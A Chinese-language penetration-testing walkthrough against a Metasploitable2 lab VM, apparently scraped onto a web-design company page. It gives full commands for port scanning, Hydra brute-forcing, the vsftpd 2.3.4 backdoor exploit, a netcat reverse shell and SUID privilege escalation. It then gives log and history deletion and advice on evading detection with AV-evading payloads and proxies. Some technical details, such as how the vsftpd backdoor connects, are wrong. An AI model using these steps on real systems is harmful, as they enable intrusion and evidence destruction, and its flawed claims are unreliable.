网站轮播图制作金华网络公司网站建设
2026/4/18 18:32:29 网站建设 项目流程
网站轮播图制作,金华网络公司网站建设,建立网站的目的,广州公关公司排名核心目标#xff1a;完成「攻击链全环节覆盖自攻自溯源」#xff0c;掌握渗透测试核心手艺#xff0c;实现“既会攻、又会防、还会藏” 环境说明#xff1a; 攻击机#xff1a;Kali Linux#xff08;IP#xff1a;192.168.1.4#xff0c;已安装 HexStrike AI、Nmap、H…核心目标完成「攻击链全环节覆盖自攻自溯源」掌握渗透测试核心手艺实现“既会攻、又会防、还会藏”环境说明攻击机Kali LinuxIP192.168.1.4已安装 HexStrike AI、Nmap、Hydra、dirsearch 等工具靶机Metasploitable2IP192.168.1.5默认开启各类脆弱服务未做任何防御配置前提两者处于同一局域网可互相 ping 通验证命令ping 192.168.1.5 -c 3流程总览信息收集 → 突破渗透 → 获取权限 → 插旗留痕 → 打扫战场 → 自攻自溯源一、第一阶段信息收集渗透的基础决定攻击方向核心目的全面摸清靶机“底细”找到可利用的漏洞点如开放端口、脆弱服务、弱口令等避免盲目攻击原则手动侦察工具辅助HexStrike AI 最终整合分析1.1 基础信息侦察网络层操作工具Nmap端口扫描工具详细步骤命令全端口扫描查看靶机开放所有端口及对应服务nmap -p 1-65535 -sV -O 192.168.1.5 -oN nmap_full_scan.txt命令说明-p 1-65535 扫描所有端口-sV 探测服务版本-O 识别操作系统-oN 保存结果到文件查看扫描结果cat nmap_full_scan.txt预期结果发现靶机开放关键端口及服务如 21/tcpvsftpd 2.3.4存在经典后门漏洞22/tcpOpenSSH 4.7p1可能存在弱口令80/tcpApache httpd 2.2.8Web 服务可能存在目录遍历、SQL 注入3306/tcpMySQL 5.0.51a数据库服务可能存在弱口令原理说明端口是服务的“窗口”开放端口对应的旧版本服务往往存在已知漏洞是渗透的核心突破口1.2 Web 服务侦察应用层操作工具dirsearch目录扫描、WhatWebCMS 识别、浏览器详细步骤命令Web 服务存活验证打开 Kali 浏览器输入 http://192.168.1.5查看是否能访问靶机 Web 页面目录扫描查找隐藏后台、敏感文件dirsearch -u http://192.168.1.5 -e php,txt,html -o dirsearch_result.txt命令说明-u 目标 URL-e 扫描指定后缀文件-o 保存结果CMS 及组件识别判断 Web 架构whatweb http://192.168.1.5预期结果 Web 页面可正常访问显示 Metasploitable2 默认页面目录扫描发现敏感路径如 /phpmyadminMySQL 管理后台、/dvwaWeb 漏洞测试平台WhatWeb 识别出 Apache 服务及相关组件版本1.3 弱口令探测凭证层操作工具Hydra暴力破解工具、默认弱口令字典Kali 自带/usr/share/wordlists/rockyou.txt.gz需解压gunzip rockyou.txt.gz详细步骤命令针对 22 端口 SSH、3306 端口 MySQL 探测弱口令破解 SSH 弱口令hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.5 -o hydra_ssh_result.txt命令说明-L 用户名字典-P 密码字典ssh:// 指定破解服务破解 MySQL 弱口令hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.5 -o hydra_mysql_result.txt预期结果发现 Metasploitable2 默认弱口令如 SSHmsfadmin/msfadminMySQLroot/无密码 或 root/root1.4 HexStrike AI 整合分析智能辅助核心目的让 AI 基于手动侦察结果生成最优攻击方案验证 AI 价值详细步骤命令启动 HexStrike AI 服务端后台运行cd /root/hexstrike-ai-master nohup python3 hexstrike_server.py hexstrike_service.log 21启动 MCP 客户端发送整合分析指令JSON 格式cd /root/hexstrike-ai-master python3 hexstrike_mcp.py在客户端内粘贴以下指令包含手动侦察到的关键信息{jsonrpc:2.0,id:1,method:execute,params:{command:generate_attack_plan,args:{target:192.168.1.5,lhost:192.168.1.4,known_info:{ports:[21,22,80,3306],services:{21:vsftpd 2.3.4,22:OpenSSH 4.7p1,80:Apache 2.2.8,3306:MySQL 5.0.51a},weak_password_possible:true},format:detailed_commands}}}预期结果AI 返回优先级排序的攻击方案如 优先级 1利用 21 端口 vsftpd 2.3.4 后门漏洞最易成功直接拿 root优先级 2使用 SSH 弱口令登录无需漏洞直接获取权限优先级 3攻击 80 端口 Web 服务如 DVWA 平台 SQL 注入二、第二阶段突破渗透核心攻击环节基于信息收集结果核心目的选择最优攻击方案突破靶机防御建立初始连接选择方案优先使用 AI 推荐的“21 端口 vsftpd 2.3.4 后门漏洞”成功率 100%直接拿高权限2.1 前置准备启动监听接收靶机反弹连接操作说明在攻击机Kali上开启端口监听等待靶机漏洞触发后主动连接# 新开终端窗口执行监听命令端口 4444可自定义需与后续攻击命令一致 nc -lvnp 4444预期结果终端显示“listening on [any] 4444 ...”表示监听成功等待连接2.2 执行攻击利用 vsftpd 2.3.4 后门漏洞操作工具Metasploit漏洞利用框架HexStrike AI 生成的攻击命令基于此详细步骤命令回到原终端非监听窗口执行 AI 生成的攻击命令msfconsole -q -x use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 192.168.1.5; set LHOST 192.168.1.4; set LPORT 4444; run命令说明 msfconsole -q静默启动 Metasploit不显示欢迎信息use exploit/unix/ftp/vsftpd_234_backdoor加载 vsftpd 2.3.4 后门漏洞利用模块set RHOSTS指定靶机 IPset LHOST/LPORT指定攻击机 IP 和监听端口与 nc 监听端口一致run执行攻击预期结果 Metasploit 显示“Exploit completed, but no session was created?” 或类似提示正常现象切换到监听终端nc 窗口发现终端提示符变为“#”表示已获取靶机 root 权限建立反弹 shell 连接原理说明vsftpd 2.3.4 版本存在后门漏洞当用户登录时输入特定用户名如:)靶机会主动在 6200 端口开启后门服务Metasploit 模块通过触发该后门让靶机主动连接攻击机的监听端口从而获取 shell 权限三、第三阶段获取权限权限验证与提权巩固核心目的验证获取的权限级别若为普通用户则进行提权确保对靶机的完全控制3.1 权限验证操作说明在监听终端已获取的 shell 中执行以下命令判断权限级别# 查看当前用户身份root 为最高权限 whoami # 查看用户组 id # 查看系统信息确认靶机环境 uname -a预期结果 whoami 输出“root”id 输出“uid0(root) gid0(root)”表示直接获取最高权限若输出普通用户如 msfadmin则需进行提权操作见下方补充步骤3.2 提权巩固补充步骤若未直接获取 root操作工具Metasploit 提权模块、SUID 提权命令详细步骤命令查找靶机上的 SUID 可执行文件SUID 权限文件可临时获取 root 权限find / -perm -4000 2/dev/null命令说明-perm -4000 筛选 SUID 权限文件2/dev/null 忽略错误信息利用 SUID 文件提权以 find 命令为例Metasploitable2 中 find 默认为 SUID 权限find / -name test -exec /bin/sh \; 2/dev/null命令说明通过 find 命令的 -exec 参数执行 /bin/sh获取 root shell验证提权结果再次执行 whoami确认输出“root”预期结果成功从普通用户提权到 root获得靶机完全控制权四、第四阶段插旗留痕模拟实战渗透的取证标识核心目的在靶机上留下“攻击成功”的标识flag模拟真实渗透测试中“证明攻击有效性”的环节详细步骤命令在 root 权限 shell 中执行# 进入靶机 root 目录最高权限目录flag 存于此更具证明力 cd /root # 创建 flag 文件写入攻击标识自定义内容包含攻击机 IP、时间、攻击方式 echo 攻击成功攻击机 IP192.168.1.4攻击时间2026-XX-XX攻击方式vsftpd 2.3.4 后门漏洞 flag_penetration_success.txt # 查看 flag 文件确认创建成功 cat flag_penetration_success.txt预期结果flag 文件创建成功终端正常显示写入的攻击标识内容原理说明真实渗透测试中“插旗”是向客户证明“漏洞确实存在、攻击可成功”的关键凭证flag 内容需唯一、可追溯避免后续争议五、第五阶段打扫战场渗透的“隐身撤离”环节核心目的清除攻击痕迹避免被靶机管理员蓝队发现模拟真实渗透中“隐蔽性”的核心要求详细步骤命令在 root 权限 shell 中执行逐一清除痕迹清除命令历史避免攻击命令被追溯# 清除当前 shell 的命令历史history -c# 删除命令历史文件永久清除rm -rf ~/.bash_history# 强制刷新确保历史记录不残留sync清除系统日志关键步骤避免登录、连接痕迹被发现# 清除认证日志记录登录、密码尝试等信息rm -rf /var/log/auth.log# 清除系统日志记录系统操作、服务启动等信息rm -rf /var/log/syslog# 清除 FTP 服务日志针对性清除 vsftpd 漏洞攻击痕迹rm -rf /var/log/vsftpd.log# 用空文件覆盖日志彻底清除避免日志删除痕迹被发现echo /var/log/auth.logecho /var/log/syslog删除临时文件及攻击残留如 flag 文件可选择性保留实战中需按客户要求# 删除攻击过程中可能生成的临时文件rm -rf /tmp/*# 可选若无需保留 flag 凭证删除 flag 文件# rm -rf /root/flag_penetration_success.txt关闭反弹 shell 连接安全撤离exit # 退出 root shellexit # 关闭 nc 监听连接预期结果攻击命令历史、系统日志、临时文件均被清除靶机上无明显攻击痕迹安全撤离注意事项实战中需严格遵守《网络安全法》仅对授权靶机进行测试清除痕迹的目的是“模拟攻击隐蔽性”而非恶意破坏或逃避责任六、第六阶段自攻自溯源攻防兼备的核心环节核心目的切换到“蓝队视角”通过靶机日志、系统痕迹反向追溯自己的攻击行为验证“打扫战场”的效果同时掌握溯源思路实现“攻中有防”前提准备为了便于溯源在“打扫战场”前可先备份靶机日志实战中蓝队会提前开启日志备份备份命令# 在攻击机上通过 scp 复制靶机日志到本地备份需靶机开启 SSH 服务scp msfadmin192.168.1.5:/var/log/* /root/penetration_backup/logs/6.1 溯源工具环境准备使用工具cat日志查看、grep日志筛选、last登录记录查看、find文件痕迹查找、tcpdump流量分析可选操作说明通过 SSH 重新登录靶机使用之前发现的弱口令 msfadmin/msfadmin切换到 root 权限su - root密码 msfadmin开始溯源# SSH 登录靶机 ssh msfadmin192.168.1.5 # 切换到 root 权限 su - root6.2 具体溯源步骤蓝队视角查看登录记录定位可疑登录# 查看所有用户登录记录包括远程登录last# 查看失败登录记录筛选暴力破解痕迹lastb预期结果若未清除 auth.log可看到攻击机192.168.1.4的 SSH 登录记录或 FTP 登录记录vsftpd 漏洞攻击触发的登录分析系统日志查找异常连接# 查找包含攻击机 IP192.168.1.4的日志记录grep 192.168.1.4 /var/log/syslog 2/dev/null# 查找包含反弹 shell 端口4444的日志记录grep 4444 /var/log/syslog 2/dev/null# 查找 vsftpd 服务的异常操作日志grep vsftpd /var/log/vsftpd.log 2/dev/null预期结果若未彻底清除日志可看到靶机与攻击机 4444 端口的连接记录、vsftpd 服务的异常登录记录如特殊用户名 :)查找系统中的异常文件如 flag 文件、临时攻击文件# 查找最近 1 天内新建的文件攻击过程中创建的文件find / -mtime -1 2/dev/null# 查找包含“flag”关键词的文件定位插旗痕迹find / -name *flag* 2/dev/null# 查看 root 目录下的异常文件ls -la /root预期结果若保留了 flag 文件可找到 /root/flag_penetration_success.txt同时可发现攻击过程中创建的临时文件痕迹分析进程及网络连接若攻击未撤离可发现残留# 查看当前运行的所有进程查找异常进程如反弹 shell 进程ps -ef | grep nc 2/dev/nullps -ef | grep sh 2/dev/null# 查看当前网络连接查找与攻击机的连接netstat -tulpn 2/dev/null预期结果若攻击后未关闭反弹 shell可看到 nc 进程反弹 shell 进程及与 192.168.1.4:4444 的连接流量分析可选需提前开启抓包 若在攻击前在靶机开启 tcpdump 抓包可分析攻击流量# 攻击前在靶机开启抓包保存到文件tcpdump -i eth0 host 192.168.1.4 -w penetration_traffic.pcap# 攻击后分析抓包文件查看攻击流量tcpdump -r penetration_traffic.pcap预期结果可看到攻击机与靶机之间的 FTP 协议流量vsftpd 漏洞攻击、TCP 连接流量反弹 shell6.3 溯源总结攻击优化核心任务基于溯源结果总结本次攻击的“痕迹漏洞”优化下次攻击策略实现“攻防互促”优化方向 若日志清除不彻底被溯源下次攻击后使用“日志覆盖删除同步”组合命令彻底清除日志若 flag 文件被发现下次插旗可选择隐藏目录如 /tmp/.hidden/或加密 flag 文件若反弹 shell 进程被发现使用免杀 shell如 msfvenom 生成免杀 payload替换 nc 反弹 shell若 IP 被暴露使用代理服务器或 VPN 隐藏真实攻击 IP七、流程总结核心知识点梳理闭环思维渗透测试不是“拿权限就结束”而是“信息收集→攻击→留痕→撤离→溯源→优化”的完整闭环每个环节都不可或缺攻防一体“自攻自溯源”是掌握真技术的关键——通过攻击理解漏洞原理通过溯源理解防御逻辑两者结合才能成为真正的安全专家工具定位HexStrike AI、Metasploit、Nmap 等都是“辅助工具”核心还是人的思维如信息收集的全面性、攻击方案的选择、溯源的逻辑推理实战原则合法授权、隐蔽性、可追溯插旗这是渗透测试的底线也是区别于恶意攻击的核心附录常用工具命令汇总工具核心功能常用命令Nmap端口扫描、服务识别nmap -p 1-65535 -sV -O 靶机IP -oN 结果文件.txtHydra弱口令暴力破解hydra -L 用户名字典 -P 密码字典 服务://靶机IP -o 结果文件.txtdirsearchWeb 目录扫描dirsearch -u http://靶机IP -e php,txt -o 结果文件.txtnc端口监听、反弹 shell监听nc -lvnp 端口反弹nc 攻击机IP 端口 -e /bin/shMetasploit漏洞利用、提权msfconsole -q -x use 模块set 参数runHexStrike AI攻击方案生成启动服务端nohup python3 hexstrike_server.py 客户端发送 JSON 指令溯源工具日志分析、痕迹查找last、grep IP 日志文件、find / -mtime -1

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询